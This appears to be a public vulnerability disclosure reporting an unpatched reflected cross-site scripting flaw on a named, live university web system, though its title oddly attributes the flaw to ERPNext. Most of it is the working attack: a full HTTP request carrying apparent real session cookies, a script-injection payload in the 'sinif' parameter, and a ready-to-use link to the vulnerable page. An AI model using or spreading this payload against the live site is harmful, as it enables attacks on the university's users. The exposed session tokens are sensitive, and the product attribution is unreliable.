Name: http://bys.comu.edu.tr/ Cross-site Scripting Vulnerabilities in ERPNext
Vendor Homepage: http://bys.comu.edu.tr/
Vulnerability Type: Reflected Cross-site Scripting
Severity: High
Status: NOTFixed
----------------------------------------------------------------------------------------------------------------------------------------------
Request Headers
POST /cdsp/raporlar/rapor_hftdrsprg.php HTTP/1.1
Content-Length: 114
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=b74d51311432faca30c286e8b1f623d7; ets_ci_sessions=B2cCbgQ3CTUGLwIjUzoJOQE1UTkEc1VyVzRfdFQlBzhSbVM0AVoFbw9qVyNWagVwAWlXNgBhADsGIFIzVjAGYAptATwDMgZnUDNUOFBiDTgHMgJtBDoJOQZgAmdTMwlpATRRZwRoVWVXZ18%2FVGIHaFJnU2MBPAUyD29XI1ZqBXABaVc0AGMAOwYgUmlWcwYNCm0BPQNlBiJQZVQuUCcNLAc9AicEOQk%2BBmYCalMiCTwBM1EtBGBVL1dgXzBUZwd%2FUjNTbgEzBSQPNVdyVmsFMgFjVz8AcQB0BnFSZVZxBg0KbQE%2BA2QGPlB0VH9Qbw19BzwCYQQzCTUGdgIdU28JcgFsUW8EPVVgV35fMlR4B2FSIlNyAWYFaQ9jV3FWMAV3ATpXZwA%2FAGQGOVIgVk4GAQpFARwDIQZpUC5UbVBvDS4HUQI9BG0JawY7AidTcwkoAUtRVwRxVTdXf182VG0Hc1I5UykBPwU3Dz1XO1ZzBW8BMld2ACcAXgZjUmNWdwY7CnoBMAN1BilQIlRmUCcNNAc3AmQEOQktBmUCZVM3CTABMVE7BGlVNVdmXzBUdAdqUn8%3D
Host: bys.comu.edu.tr
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
---------------------------------------------------------------------------------------------------------------------------------------------
alert here =>
bol_kodu=12312&fak_kodu=&sinif=%3Cscript%3Ealert(document.domain);%3C/script%3E
----------------------------------------------------------------------------------------------------------------------------------------------
Full link
http://bys.comu.edu.tr//cdsp/raporlar/rapor_hftdrsprg.php?bol_kodu=12312&fak_kodu=&sinif=%3Cscript%3Ealert(document.domain);%3C/script%3E
